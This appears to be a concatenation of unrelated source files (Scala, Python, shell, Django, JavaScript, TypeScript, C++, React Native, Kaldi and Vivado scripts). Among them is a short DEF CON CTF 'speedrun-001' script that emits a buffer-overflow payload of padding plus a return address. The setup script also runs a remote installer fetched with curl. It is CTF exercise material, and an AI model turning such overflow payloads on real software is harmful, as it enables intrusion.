   * The Guice injector, created eagerly when this object is first loaded.
   */
  val Injector = createInjector
  /**
   * Loads the controller classes with the Guice injector. So it's possible to inject dependencies
   * directly into the controller.
   *
   * @param controllerClass The controller class to instantiate.
   * @return The instance of the controller class.
   * @throws Exception if the controller couldn't be instantiated.
   */
  override def getControllerInstance[A](controllerClass: Class[A]): A = {
    Injector.getInstance(controllerClass)
  }
  /**
   * Create the injector instance.
   *
   * @return The injector instance bound to this application's [[BaseModule]].
   */
  private def createInjector = Guice.createInjector(new BaseModule)
}
|
<reponame>shyga362/projetoPython
# Read one line from the user and report which str character-class
# predicates it satisfies (numeric, alpha, alphanumeric, upper, lower,
# whitespace-only). Prompt and labels are user-facing Portuguese strings
# and are left exactly as written.
v = input('digite algo')
print(type(v))
print('ele é numero {}'.format(v.isnumeric()))
print('ele é letra {}'.format(v.isalpha()))
print('ele é letra e numero {}'.format(v.isalnum()))
print('tem somente letras maiusculas {}'.format(v.isupper()))
print('tem somente letras minusculas {}'.format(v.islower()))
print('tem somente espaço {}'.format(v.isspace()))
|
#!/bin/bash
# Fedora workstation shell setup: zsh + Oh My Zsh + antigen + Powerlevel10k,
# vim + vim-plug, and the MesloLGS Nerd Fonts the p10k theme expects.
# Heredocs quoted with 'EOL' are written verbatim (no expansion here).
# util-linux-user: provides chsh command
# zsh: provides zsh shell
# vim: provides enhanced vi text editor
echo "Installing packages"
sudo dnf install util-linux-user zsh vim -y
echo "Downloading Oh My Zsh"
cd ~
# NOTE(review): runs the remote installer unverified and it may switch the
# shell interactively; the generated .zshrc below overwrites its default.
sh -c "$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"
# Download antigen plugin manager for zsh
echo "Downloading antigen"
curl -L git.io/antigen > ~/antigen.zsh
# Overwrite zsh config (.zshrc)
echo "Creating zsh config"
cat > ~/.zshrc << 'EOL'
# Enable Powerlevel10k instant prompt. Should stay close to the top of ~/.zshrc.
# Initialization code that may require console input (password prompts, [y/n]
# confirmations, etc.) must go above this block; everything else may go below.
if [[ -r "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh" ]]; then
source "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh"
fi
source ~/antigen.zsh
antigen init ~/.antigenrc
# To customize prompt, run `p10k configure` or edit ~/.p10k.zsh.
[[ ! -f ~/.p10k.zsh ]] || source ~/.p10k.zsh
# Install Ruby Gems to ~/gems
export GEM_HOME="$HOME/gems"
path+=("$HOME/gems/bin")
path+=("$HOME/.local/bin")
export PATH
EOL
# Create antigen config
echo "Creating antigen config"
cat > ~/.antigenrc << 'EOL'
# Load the oh-my-zsh library
antigen use oh-my-zsh
# PLugins with oh-my-zsh
antigen bundle git
antigen bundle pip
antigen bundle command-not-found
antigen bundle sudo # double esc
# External plugins
antigen bundle MichaelAquilina/zsh-you-should-use
antigen bundle zsh-users/zsh-autosuggestions
antigen bundle zsh-users/zsh-completions
antigen bundle zsh-users/zsh-syntax-highlighting # Must be the last plugin to take effect
# Theme
antigen theme romkatv/powerlevel10k
# Apply config
antigen apply
EOL
# Download vim-plug plugin manager for vim
echo "Downloading vim-plug"
curl -fLo ~/.vim/autoload/plug.vim --create-dirs https://raw.githubusercontent.com/junegunn/vim-plug/master/plug.vim
# Create vim-plug config
echo "Creating vim-plug config"
cat > ~/.vimrc << 'EOL'
" Specify a directory for plugins
" - Avoid using standard Vim directory names like 'plugin'
" Apply changes with :PlugInstall
call plug#begin('~/.vim/plugged')
Plug 'morhetz/gruvbox'
Plug 'vim-airline/vim-airline'
Plug 'yggdroot/indentline'
" :UndotreeToggle
Plug 'mbbill/undotree'
Plug 'tpope/vim-fugitive'
Plug 'tpope/vim-sensible'
" Initialize plugin system
call plug#end()
:set number
EOL
# Install nerd fonts which work best with Powerlevel10k for zsh
echo "Installing MesloLGS fonts"
mkdir --parents ~/.local/share/fonts
cd ~/.local/share/fonts
curl -fLo "MesloLGS NF Regular.ttf" https://github.com/romkatv/powerlevel10k-media/raw/master/MesloLGS%20NF%20Regular.ttf
curl -fLo "MesloLGS NF Bold.ttf" https://github.com/romkatv/powerlevel10k-media/raw/master/MesloLGS%20NF%20Bold.ttf
curl -fLo "MesloLGS NF Italic.ttf" https://github.com/romkatv/powerlevel10k-media/raw/master/MesloLGS%20NF%20Italic.ttf
curl -fLo "MesloLGS NF Bold Italic.ttf" https://github.com/romkatv/powerlevel10k-media/raw/master/MesloLGS%20NF%20Bold%20Italic.ttf
# Update font cache
echo "Updating font cache"
sudo fc-cache -vf ~/.local/share/fonts
# Change shell to zsh (user interaction required)
echo "Changing shell to zsh"
chsh -s $(which zsh)
echo "All done!"
echo "You may need to log out and back in again"
echo "You may also need to configure your terminal to use \"MesloLGS\" fonts for Powerlevel10k to display correctly."
|
<gh_stars>1-10
# Generated by Django 2.1.11 on 2019-08-14 03:10
from django.db import migrations
class Migration(migrations.Migration):
    """Add per-financial-year uniqueness constraints.

    Each affected model gains a unique_together pairing its business key
    with ``fy``, so the same identifier may recur across financial years
    but not within one. Auto-generated by Django 2.1.11; do not hand-edit
    beyond documentation.
    """

    dependencies = [
        ('sfm', '0001_squashed_0003_auto_20180319_0924'),
        ('ibms', '0010_auto_20190808_1104'),
    ]

    operations = [
        migrations.AlterUniqueTogether(
            name='corporatestrategy',
            unique_together={('corporateStrategyNo', 'fy')},
        ),
        migrations.AlterUniqueTogether(
            name='glpivdownload',
            unique_together={('gLCode', 'fy')},
        ),
        migrations.AlterUniqueTogether(
            name='ibmdata',
            unique_together={('ibmIdentifier', 'fy')},
        ),
        migrations.AlterUniqueTogether(
            name='ncservicepriority',
            unique_together={('servicePriorityNo', 'fy')},
        ),
        migrations.AlterUniqueTogether(
            name='ncstrategicplan',
            unique_together={('strategicPlanNo', 'fy')},
        ),
    ]
|
<gh_stars>10-100
// Normalize email address to ensure that a user can't register twice
// with the variations of the same email.
//
// The algorithm is as follows:
//
// 1. User name normalization
//
// - lowercase
// - remove mailbox extensions (google uses '+', yahoo uses '-',
// we remove only '+' because don't have any yahoo users)
// - *not implemented*: convert unicode to ascii (remove accents,
// diacritics, etc.)
// - remove padding characters (we remove '.' for all domains)
//
// 2. Domain name normalization
//
// - lowercase
// - *not implemented*: convert to punycode
// - change aliases to primary domain (googlemail.com -> gmail.com)
// - *not implemented*: remove 3rd level domain
// (email.msn.com -> msn.com, but not for mail.co.uk)
//
// This module should only be used for uniqueness check, all emails
// should still go to the exact mailbox specified by the user.
//
// This module does not guarantee that normalized emails are actually the same
// (e.g. we delete all dots, but `<EMAIL>` can be different from
// `<EMAIL>`), so do not use this as an alias for logging in.
//
// Here's a relevant article about email normalization and verification:
// http://girders.org/blog/2013/01/31/dont-rfc-validate-email-addresses/
//
'use strict';
const punycode = require('punycode');
// Gmail rules: case-insensitive, dots in the local part are ignored,
// and '+suffix' denotes a mailbox extension that is stripped.
function normalize_gmail(username) {
    return username
        .toLowerCase()
        .replace(/\./g, '')     // dots are not significant for gmail
        .replace(/\+.*/g, '');  // drop the '+extension' mailbox suffix
}
// Yahoo rules: case-insensitive; '-' starts a mailbox extension.
function normalize_yahoo(username) {
    const lowered = username.toLowerCase();
    return lowered.replace(/\-.*/g, '');
}
// Yandex rules: case-insensitive; '.' is an alias for '-', so all dashes
// are canonicalized to dots.
// https://yandex.com/support/mail/faq.xml#mail-aliases
function normalize_yandex(username) {
    return username.toLowerCase().replace(/-/g, '.');
}
// Mail.ru rules: only case-insensitivity; no extension or padding syntax.
function normalize_mailru(username) {
    const lowered = username.toLowerCase();
    return lowered;
}
// Default rules for unrecognized providers: case-insensitive, and treat
// '+suffix' as a mailbox extension to strip.
function normalize_generic(username) {
    return username.toLowerCase().replace(/\+.*/g, '');
}
// Per-provider normalization rules keyed by the primary domain. Each entry
// may list `aliases` (alternate domains folded into the primary) and must
// supply `fn`, the username normalizer for that provider. The `default`
// entry handles every unmatched domain.
// NOTE(review): 'yahoo.com' itself is absent from the yahoo entry (only
// 'yahoo.net' plus yahoodns/ymail aliases), so yahoo.com addresses fall
// through to the generic rule — confirm this is intended.
let rules = {
    'gmail.com': {
        aliases: [ 'googlemail.com' ],
        fn: normalize_gmail
    },
    'yahoo.net': {
        aliases: [ 'yahoodns.com', 'ymail.com' ],
        fn: normalize_yahoo
    },
    'yandex.com': {
        aliases: [ 'yandex.ru', 'narod.ru', 'yandex.ua', 'yandex.by', 'yandex.kz', 'ya.ru' ],
        fn: normalize_yandex
    },
    'mail.ru': {
        aliases: [ 'list.ru', 'inbox.ru' ],
        fn: normalize_mailru
    },
    default: { fn: normalize_generic }
};
// Normalize a full email address for uniqueness checks (see the module
// header comment for the algorithm and its caveats). Returns the
// normalized address as 'username@domain'.
module.exports = function normalize_email(email_str) {
    let email_parts = email_str.split('@');
    let domain = email_parts.pop();
    // Re-join the remainder in case the local part itself contained '@'.
    let username = email_parts.join('@');
    // lowercase domain
    domain = domain.toLowerCase();
    // punycode should get normalized domain (i.e. after lowercase)
    domain = punycode.toASCII(domain);
    // Apply the first provider rule whose primary domain or alias matches,
    // collapsing the alias to the primary domain.
    for (let r of Object.keys(rules)) {
        if (r === domain || rules[r].aliases && rules[r].aliases.indexOf(domain) !== -1) {
            username = rules[r].fn(username);
            domain = r;
            return username + '@' + domain;
        }
    }
    // No provider-specific rule matched: use the generic normalizer.
    username = rules.default.fn(username);
    return username + '@' + domain;
};
|
<reponame>dereekb/dbcomponents
import { Observable } from 'rxjs';
import { DocumentData, DocumentReference, DocumentSnapshot, PartialWithFieldValue, SetOptions, UpdateData, WithFieldValue, WriteResult } from '../types';
import { FirestoreDocumentDataAccessor, FirestoreDocumentDataAccessorFactory, FirestoreDocumentDeleteParams, FirestoreDocumentUpdateParams } from './accessor';
// MARK: Abstract Wrapper
/**
* Abstract wrapper for a FirestoreDocumentDataAccessor.
*
* Forwards all non-overridden accessor functions to the wrapped accessor by default.
*/
/**
 * Abstract wrapper for a FirestoreDocumentDataAccessor.
 *
 * Forwards all non-overridden accessor functions to the wrapped accessor by default.
 */
export abstract class AbstractFirestoreDocumentDataAccessorWrapper<T, D = DocumentData> implements FirestoreDocumentDataAccessor<T, D> {
  constructor(readonly accessor: FirestoreDocumentDataAccessor<T, D>) {}

  /** Reference to the wrapped document. */
  get documentRef(): DocumentReference<T> {
    return this.accessor.documentRef;
  }

  /** Observable stream of document snapshots from the wrapped accessor. */
  stream(): Observable<DocumentSnapshot<T>> {
    return this.accessor.stream();
  }

  /** Fetch the current document snapshot. */
  get(): Promise<DocumentSnapshot<T>> {
    return this.accessor.get();
  }

  /** Whether the document currently exists. */
  exists(): Promise<boolean> {
    return this.accessor.exists();
  }

  /** Delete the document, forwarding any delete params. */
  delete(params?: FirestoreDocumentDeleteParams): Promise<void | WriteResult> {
    return this.accessor.delete(params);
  }

  set(data: PartialWithFieldValue<T>, options: SetOptions): Promise<WriteResult | void>;
  set(data: WithFieldValue<T>): Promise<WriteResult | void>;
  set(data: PartialWithFieldValue<T> | WithFieldValue<T>, options?: SetOptions): Promise<void | WriteResult> {
    return this.accessor.set(data, options as SetOptions);
  }

  /**
   * Update fields on the document.
   *
   * BUG FIX: this previously called `this.update(data, params)`, recursing
   * into itself infinitely (stack overflow on first use) instead of
   * forwarding to the wrapped accessor.
   */
  update(data: UpdateData<D>, params?: FirestoreDocumentUpdateParams): Promise<void | WriteResult> {
    return this.accessor.update(data, params);
  }
}
// MARK: Factory
export type WrapFirestoreDocumentDataAccessorFunction<T, D = DocumentData> = (input: FirestoreDocumentDataAccessor<T, D>) => FirestoreDocumentDataAccessor<T, D>;
export type InterceptAccessorFactoryFunction<T, D = DocumentData> = (input: FirestoreDocumentDataAccessorFactory<T, D>) => FirestoreDocumentDataAccessorFactory<T, D>;
/**
 * Build an accessor-factory interceptor: the returned function takes a
 * factory and yields a new factory whose accessors are passed through
 * `wrap` before being handed to callers.
 */
export function interceptAccessorFactoryFunction<T, D = DocumentData>(wrap: WrapFirestoreDocumentDataAccessorFunction<T, D>): InterceptAccessorFactoryFunction<T, D> {
  return (factory: FirestoreDocumentDataAccessorFactory<T, D>) => {
    return {
      accessorFor(ref) {
        return wrap(factory.accessorFor(ref));
      }
    };
  };
}
|
<filename>2019/05-defcon/pwn-speedrun-001/make_string_01.py
# DEF CON 2019 "speedrun-001" pwn: emit the overflow payload on stdout.
# 1032 filler bytes (presumably padding up to the saved return address —
# TODO confirm against the binary) followed by a little-endian 64-bit
# value 0x4507da (per the original comment, an `int 3` gadget address).
import sys
padding = b"A"*1032
exploit = b'\xda\x07\x45\x00\x00\x00\x00\x00' # (int 3)
# exploit = '\x30\xdf\xff\xf7\xff\xff\x7f\x00\x00' # (getcpu)
exploit = padding + exploit
# Write raw bytes via the binary buffer so no text encoding mangles them.
sys.stdout.buffer.write(exploit)
|
<reponame>MrPepperoni/Reaping2-1
#ifndef INCLUDED_CORE_I_BUFF_HOLDER_COMPONENT_H
#define INCLUDED_CORE_I_BUFF_HOLDER_COMPONENT_H
#include "core/component.h"
#include "platform/i_platform.h"
#include "buff.h"
using namespace ::boost::multi_index;
// Holds all buffs attached to an entity in a boost::multi_index container
// with two orderings: by buff type, and by (seconds-to-end, auto-remove).
class BuffHolder
{
public:
    // Key extractor: orders buffs by their type id.
    struct BuffOrderer
    {
        typedef int32_t result_type;
        result_type operator()( const Opt<Buff>& buff )const
        {
            return buff->GetType();
        }
    };
    // Key extractor: orders buffs by remaining duration in seconds.
    struct SecsToEndOrderer
    {
        typedef double result_type;
        result_type operator()( const Opt<Buff>& buff )const
        {
            return buff->GetSecsToEnd();
        }
    };
    // Key extractor: partitions buffs by whether they expire automatically.
    struct AutoRemoveOrderer
    {
        typedef bool result_type;
        result_type operator()( const Opt<Buff>& buff )const
        {
            return buff->IsAutoRemove();
        }
    };
    // Index 0: non-unique ordering by buff type (equal_range lookups by type).
    // Index 1: non-unique ordering by (secs-to-end, auto-remove) for expiry scans.
    typedef multi_index_container <
        Opt<Buff>,
        indexed_by <
            ordered_non_unique <
                composite_key <
                    Opt<Buff>,
                    BuffHolder::BuffOrderer
                >
            >,
            ordered_non_unique <
                composite_key <
                    Opt<Buff>,
                    BuffHolder::SecsToEndOrderer,
                    BuffHolder::AutoRemoveOrderer
                >
            >
        >
    > BuffList_t;
    // Convenience alias for the expiry-ordered view (index 1).
    typedef BuffList_t::nth_index<1>::type BuffListSecsToEnd_t;
    BuffList_t mAllBuffs;  // every buff currently held
};
typedef BuffHolder::BuffList_t BuffList_t;
// Primary template: a "filter" over the whole buff list that applies no
// filtering at all — begin/end/size simply mirror the container. The
// specializations below (N = 0, 1) narrow to an equal_range on the
// corresponding multi_index index.
template<int N>
class BuffListFilter
{
public:
    typedef BuffList_t::const_iterator const_iterator;
protected:
    BuffList_t::const_iterator mI;  // range begin
    BuffList_t::const_iterator mE;  // range end
    size_t mSize;                   // cached element count
public:
    BuffListFilter( BuffList_t const& bufflist )
    {
        mI = bufflist.begin();
        mE = bufflist.end();
        mSize = bufflist.size();
    }
    const_iterator begin()
    {
        return mI;
    }
    const_iterator end()
    {
        return mE;
    }
    size_t size()
    {
        return mSize;
    }
};
// Specialization over index 0: the range of buffs with a given static
// type id (equal_range on the type-ordered index).
template<>
class BuffListFilter<0>
{
public:
    typedef BuffList_t::nth_index<0>::type::const_iterator const_iterator;
protected:
    const_iterator mI;  // range begin
    const_iterator mE;  // range end
    size_t mSize;       // cached, computed once via std::distance
public:
    BuffListFilter( BuffList_t const& bufflist, int32_t buffStaticType )
    {
        boost::tie( mI, mE ) = bufflist.get<0>().equal_range( boost::make_tuple( buffStaticType ) );
        mSize = std::distance( mI, mE );
    }
    const_iterator begin()
    {
        return mI;
    }
    const_iterator end()
    {
        return mE;
    }
    size_t size()
    {
        return mSize;
    }
};
// Specialization over index 1: the range of auto-remove buffs with a given
// remaining duration (equal_range on the (secs-to-end, auto-remove) index;
// the second key is fixed to true).
// NOTE(review): the parameter is int32_t while the index key is double —
// exact equal_range matches on a float key look fragile; confirm callers
// only pass sentinel values (e.g. 0).
template<>
class BuffListFilter<1>
{
public:
    typedef BuffList_t::nth_index<1>::type::const_iterator const_iterator;
protected:
    const_iterator mI;  // range begin
    const_iterator mE;  // range end
    size_t mSize;       // cached, computed once via std::distance
public:
    BuffListFilter( BuffList_t const& bufflist, int32_t secsToEnd )
    {
        boost::tie( mI, mE ) = bufflist.get<1>().equal_range( boost::make_tuple( secsToEnd, true ) );
        mSize = std::distance( mI, mE );
    }
    const_iterator begin()
    {
        return mI;
    }
    const_iterator end()
    {
        return mE;
    }
    size_t size()
    {
        return mSize;
    }
};
// Component interface exposing an entity's buff list and buff insertion.
class IBuffHolderComponent : public Component
{
public:
    // Names for the two multi_index views of the buff list.
    enum BuffIndex
    {
        All = 0,        // index 0: ordered by buff type
        SecsToEnd = 1   // index 1: ordered by remaining duration
    };
    virtual BuffList_t& GetBuffList() = 0;
    // Takes ownership of the buff.
    // NOTE(review): std::auto_ptr is deprecated (removed in C++17); moving
    // to std::unique_ptr would change this virtual signature for all
    // implementers, so it is only flagged here.
    virtual void AddBuff( std::auto_ptr<Buff> buff ) = 0;
    DEFINE_COMPONENT_BASE( IBuffHolderComponent )
    friend class ::boost::serialization::access;
    template<class Archive>
    void serialize( Archive& ar, const unsigned int version );
};
// Boost.Serialization hook: only the Component base state is serialized;
// this interface adds no data members of its own.
template<class Archive>
void IBuffHolderComponent::serialize( Archive& ar, const unsigned int version )
{
    ar& boost::serialization::base_object<Component>( *this );
}
#endif//INCLUDED_CORE_I_BUFF_HOLDER_COMPONENT_H
|
<reponame>TheReincarnator/calc-k8s
package com.thomasjacob.calck8s.calck8sbackend;
import java.io.Serializable;
/**
 * Simple DTO carrying the textual result of a calculation.
 * Serializable so it can cross serialization boundaries (caching, RPC).
 */
public class CalculationResult implements Serializable {

    /** The result text. */
    private String text;

    public CalculationResult(String text) {
        this.text = text;
    }

    /** @return the result text */
    public String getText() {
        return text;
    }

    /** @param text the new result text */
    public void setText(String text) {
        this.text = text;
    }
}
|
#!/bin/bash
# Update ~/.dotfiles (and its git submodules) if the checkout exists;
# silently do nothing otherwise.
if [ -d ~/.dotfiles ]; then
cd ~/.dotfiles && git pull --recurse-submodules
fi
|
function validateHackathon(hackathon) {
let errors = [];
if (!hackathon.location || hackathon.location.trim().length <= 0) {
errors.push('Please include a hackathon location.');
}
if (!hackathon.name || hackathon.name.trim().length <= 0) {
errors.push('Please include a hackathon name.');
}
if (!hackathon.description || hackathon.description.trim().length <= 0) {
errors.push('Please include a hackathon description.');
}
return {
isSuccessful: errors.length > 0 ? false : true,
errors
};
}
module.exports = {
validateHackathon
};
|
<filename>dynatrace_utils.js
'use strict';
/* jshint node: true */
var sa = require('superagent');
/**
 * Thin client for a couple of Dynatrace REST API calls.
 * NOTE(review): the property name `dtTentant` looks like a typo for
 * `dtTenant`; it is used consistently below, so renaming is cosmetic only.
 *
 * @param {string} tenant Dynatrace tenant base URL.
 * @param {string} token  API token sent in the `authorization` header.
 */
function DynatraceUtils(tenant, token) {
    this.dtTentant = tenant;
    this.apiToken = token;
}

/**
 * Query total bytes sent on a host's NIC over [startTime, endTime] via the
 * timeseries API, and pass the single aggregated value to `done`.
 *
 * @param {string} host      Dynatrace entity id of the host.
 * @param {number} startTime Start timestamp (ms).
 * @param {number} endTime   End timestamp (ms).
 * @param {function(Error?, *)} done Node-style callback; on success the
 *   second argument is the first data point's value.
 */
DynatraceUtils.prototype.getLoad = function(host, startTime, endTime, done) {
    var url = this.dtTentant + '/api/v1/timeseries';
    sa.post(url)
        .set('authorization', this.apiToken)
        .set('Content-Type', 'application/json')
        .send({
            startTimestamp: startTime
        })
        .send({
            endTimestamp: endTime
        })
        .send({
            queryMode: "total"
        })
        .send({
            timeseriesId: "com.dynatrace.builtin:host.nic.bytessent"
        })
        .send({
            aggregationType: "SUM"
        })
        .send({
            entities: [host]
        })
        .end(function(error, resp) {
            if (error) {
                done(error, resp);
            } else {
                // The response keys dataPoints by entity; take the first
                // entity's first [timestamp, value] pair and return the value.
                var key = Object.keys(resp.body.result.dataPoints)[0];
                var load = resp.body.result.dataPoints[key][0][1];
                done(null, load);
            }
        });
};

/**
 * Post a comment onto an existing Dynatrace problem.
 *
 * @param {string} problemId Problem to annotate.
 * @param {Object} comment   Comment payload per the problem API.
 * @param {function(Error?, *)} done Node-style callback with the raw response.
 */
DynatraceUtils.prototype.addComment = function(problemId, comment, done) {
    var url = this.dtTentant + '/api/v1/problem/details/' + problemId + '/comments';
    sa.post(url)
        .set('authorization', this.apiToken)
        .set('Content-Type', 'application/json')
        .send(comment)
        .end(function(error, resp) {
            done(error, resp);
        });
};

module.exports = DynatraceUtils;
#include<iostream>
using namespace std;
// Return the sum of the first n elements of arr. n <= 0 yields 0.
int sumArray(int arr[], int n)
{
    int total = 0;
    for (int index = n; index-- > 0; ) {
        total += arr[index];
    }
    return total;
}
// Demo driver: sum a fixed sample array and print the result.
int main()
{
    int values[] = {2, 3, 4, 5, 6};
    const int count = sizeof(values) / sizeof(values[0]);
    std::cout << "Sum of the array is: " << sumArray(values, count);
    return 0;
}
import * as PIXI from "pixi.js";
import { Ground } from "./ground/ground";
import { GameObject } from "./abstract/game-object";
/**
 * Singleton holding the game world's stage, ground, background, and the
 * list of active game objects.
 *
 * NOTE(review): `stage` and `ground` are declared but never assigned in
 * this file — presumably initialized by game bootstrap code elsewhere;
 * `setBackground`/`addObjectToWorld` will throw if called before that.
 */
export class World {
    // Eagerly-created singleton; the constructor guard below relies on
    // this field still being undefined during this very initializer.
    private static instance: World = new World();
    stage: PIXI.Container;
    ground: Ground;
    gameObjects: GameObject[];
    private background: PIXI.Sprite;

    constructor() {
        // Reject any construction after the static instance exists.
        if (World.instance) {
            throw new Error("Error: Instantiation failed: Use World.getInstance() instead of new.");
        }
        World.instance = this;
        this.gameObjects = [];
    }

    /** The single World instance. */
    public static getInstance(): World {
        return World.instance;
    }

    /**
     * Set (or swap) the full-stage background sprite; the sprite is created
     * lazily and inserted at the bottom of the display list.
     */
    public static setBackground(backgroundTexture: PIXI.Texture): any {
        if (!this.WorldInstance.background) {
            this.WorldInstance.background = new PIXI.Sprite(backgroundTexture);
            this.WorldInstance.stage.addChildAt(this.WorldInstance.background, 0);
        } else {
            this.WorldInstance.background.texture = backgroundTexture;
        }
    }

    /** True when the object's y position is at or below the ground line. */
    public static isObjectOnGround(gameObject: GameObject) {
        if (gameObject.y >= World.getInstance().ground.y) {
            return true;
        }
        return false;
    }

    /** Register a game object and add it to the stage for rendering. */
    public static addObjectToWorld(gameObject: GameObject) {
        this.WorldInstance.gameObjects.push(gameObject);
        this.WorldInstance.stage.addChild(gameObject);
    }

    /** Shorthand accessor for the singleton used by the static helpers. */
    private static get WorldInstance() {
        return World.getInstance();
    }
}
|
import React, { useState, useEffect, useRef, useCallback } from "react";
import {
TouchableWithoutFeedback,
View,
StyleSheet,
Dimensions,
Animated,
} from "react-native";
import { MaterialIcons } from "@expo/vector-icons";
const DoubleClick = (props) => {
const delayTime = props.delay ? props.delay : 300;
const [firstPress, setFirstPress] = useState(true);
const [lastTime, setLastTime] = useState(new Date());
const [modalVisible, setModalVisible] = useState(false);
let timer = false;
const fadeAnim = useRef(new Animated.Value(0)).current;
const timeout = props.timeout ? props.timeout : 1000;
useEffect(() => {
if (modalVisible) {
fadeIn();
setTimeout(() => {
fadeOut();
}, timeout);
setModalVisible(false);
}
}, [fadeIn, fadeOut, modalVisible]);
useEffect(() => {
if (timer) clearTimeout(timer);
}, [timer]);
const onPress = () => {
const now = new Date().getTime();
if (firstPress) {
setFirstPress(false);
timer = setTimeout(() => {
setFirstPress(true);
}, delayTime);
setLastTime(now);
} else if (now - lastTime < delayTime) {
setModalVisible(true);
if (timer) clearTimeout(timer);
props.doubleClick();
setFirstPress(true);
}
};
const fadeIn = useCallback(() => {
Animated.timing(fadeAnim, {
toValue: 1,
duration: 250,
}).start();
}, [fadeAnim]);
const fadeOut = useCallback(() => {
Animated.timing(fadeAnim, {
toValue: 0,
duration: 250,
}).start();
}, [fadeAnim]);
return (
<TouchableWithoutFeedback onPress={onPress}>
<View>
{props.icon && (
<Animated.View
style={{
opacity: fadeAnim,
...styles.favoriteIcon,
}}
>
<MaterialIcons
name="favorite"
size={props.size ? props.size : 120}
color={props.color ? props.color : "rgba(255, 102, 102, 0.88)"}
/>
</Animated.View>
)}
{props.children}
</View>
</TouchableWithoutFeedback>
);
};
// Overlay styling for the centered favorite icon flashed on double tap.
const styles = StyleSheet.create({
  favoriteIcon: {
    alignItems: "center",
    alignSelf: "center",
    justifyContent: "center",
    // Roughly vertically centered for a square, screen-wide image area.
    marginTop: Dimensions.get("window").width * 0.5 - 60,
    position: "absolute",
    zIndex: 10,
  },
});

export default DoubleClick;
|
#!/bin/bash
# Auto-generated SGE array-task script: shuffles training examples and runs
# one parallel nnet training step (model iteration 47 -> 48) for array task
# ${SGE_TASK_ID}.
cd /home/nlpserver/zzilong/kaldi/egs/supermarket-product
. ./path.sh
# Record host, start time and the exact command line at the top of the log.
( echo '#' Running on `hostname`
echo '#' Started at `date`
echo -n '# '; cat <<EOF
nnet-shuffle-egs --buffer-size=5000 --srand=47 ark:exp/nnet4a/egs/egs.${SGE_TASK_ID}.2.ark ark:- | nnet-train-parallel --num-threads=8 --minibatch-size=128 --srand=47 exp/nnet4a/47.mdl ark:- exp/nnet4a/48.${SGE_TASK_ID}.mdl
EOF
) >exp/nnet4a/log/train.47.$SGE_TASK_ID.log
time1=`date +"%s"`
# Both stdout and stderr are appended to the same task log.
( nnet-shuffle-egs --buffer-size=5000 --srand=47 ark:exp/nnet4a/egs/egs.${SGE_TASK_ID}.2.ark ark:- | nnet-train-parallel --num-threads=8 --minibatch-size=128 --srand=47 exp/nnet4a/47.mdl ark:- exp/nnet4a/48.${SGE_TASK_ID}.mdl ) 2>>exp/nnet4a/log/train.47.$SGE_TASK_ID.log >>exp/nnet4a/log/train.47.$SGE_TASK_ID.log
ret=$?
time2=`date +"%s"`
echo '#' Accounting: time=$(($time2-$time1)) threads=1 >>exp/nnet4a/log/train.47.$SGE_TASK_ID.log
echo '#' Finished at `date` with status $ret >>exp/nnet4a/log/train.47.$SGE_TASK_ID.log
# Exit code 137 (SIGKILL, typically the queue's resource killer) is mapped
# to 100 so the grid engine retries the task.
[ $ret -eq 137 ] && exit 100;
touch exp/nnet4a/q/done.12592.$SGE_TASK_ID
# POSIX $(( )) arithmetic replaces the deprecated $[ ] form.
exit $(( ret ? 1 : 0 ))
## submitted with:
# qsub -v PATH -cwd -S /bin/bash -j y -l arch=*64* -o exp/nnet4a/q/train.47.log -l mem_free=10G,ram_free=2G,arch=*64 -l mem_free=1G,ram_free=1G -pe smp 4 -t 1:8 /home/nlpserver/zzilong/kaldi/egs/supermarket-product/exp/nnet4a/q/train.47.sh >>exp/nnet4a/q/train.47.log 2>&1
|
import React, { useEffect, useState, useRef } from 'react'
import { NavigationContainer } from '@react-navigation/native'
import { createStackNavigator } from '@react-navigation/stack'
import { StyleSheet, Text, View } from 'react-native'
import DrawerNavigator from './navigation/DrawerNavigator'
import { firebase } from './firebase/config'
import { decode, encode } from 'base-64'
import LoginScreen from './screens/Login'
import RegistrationScreen from './screens/Register'
// The Firebase JS SDK expects the browser base64 helpers (btoa/atob);
// polyfill them in the React Native runtime using the base-64 package.
if (!global.btoa) {
  global.btoa = encode
}
if (!global.atob) {
  global.atob = decode
}
// One shared stack navigator instance for the whole app.
const Stack = createStackNavigator()
const App = () => {
const [loading, setLoading] = useState(false)
const [user, setUser] = useState(null)
const logOut = () => {
setLoading(true)
firebase
.auth()
.signOut()
.then(() => {
setUser(null)
})
.catch((error) => alert(error))
.finally(() => setLoading(false))
}
const handleAuthChange = () => {
setLoading(true)
firebase.auth().onAuthStateChanged((user) => {
if (!user) {
setLoading(false)
return
}
setUserData(user)
})
}
const setUserData = (user) => {
setLoading(true)
firebase
.firestore()
.collection('users')
.doc(user.uid)
.get()
.then((document) => {
let userData = document.data()
if (!userData) {
userData = {
email: user.email,
fullName: user.displayName,
id: user.uid,
}
}
setUser(userData)
})
.catch((error) => {
alert(error)
})
.finally(() => {
setLoading(false)
})
}
useEffect(() => {
handleAuthChange()
}, [])
if (loading) {
return (
<View style={styles.container}>
<Text>Loading...</Text>
</View>
)
}
return (
<NavigationContainer>
<Stack.Navigator
screenOptions={{
headerShown: false,
}}
>
{user && (
<Stack.Screen name="Main">
{(props) => <DrawerNavigator {...props} logOut={logOut} />}
</Stack.Screen>
)}
<Stack.Screen name="Login" component={LoginScreen} />
<Stack.Screen name="Registration" component={RegistrationScreen} />
</Stack.Navigator>
</NavigationContainer>
)
}
// Full-screen centered container used for the loading state.
const styles = StyleSheet.create({
  container: {
    alignItems: 'center',
    backgroundColor: '#fff',
    flex: 1,
    justifyContent: 'center',
  },
})

export default App
|
#!/bin/bash -f
#*********************************************************************************************************
# Vivado (TM) v2019.2 (64-bit)
#
# Filename : data_mem_256x32.sh
# Simulator : Mentor Graphics Questa Advanced Simulator
# Description : Simulation script for compiling, elaborating and verifying the project source files.
# The script will automatically create the design libraries sub-directories in the run
# directory, add the library logical mappings in the simulator setup file, create default
# 'do/prj' file, execute compilation, elaboration and simulation steps.
#
# Generated by Vivado on Wed Jun 03 21:15:35 +0800 2020
# SW Build 2708876 on Wed Nov 6 21:40:23 MST 2019
#
# Copyright 1986-2019 Xilinx, Inc. All Rights Reserved.
#
# usage: data_mem_256x32.sh [-help]
# usage: data_mem_256x32.sh [-lib_map_path]
# usage: data_mem_256x32.sh [-noclean_files]
# usage: data_mem_256x32.sh [-reset_run]
#
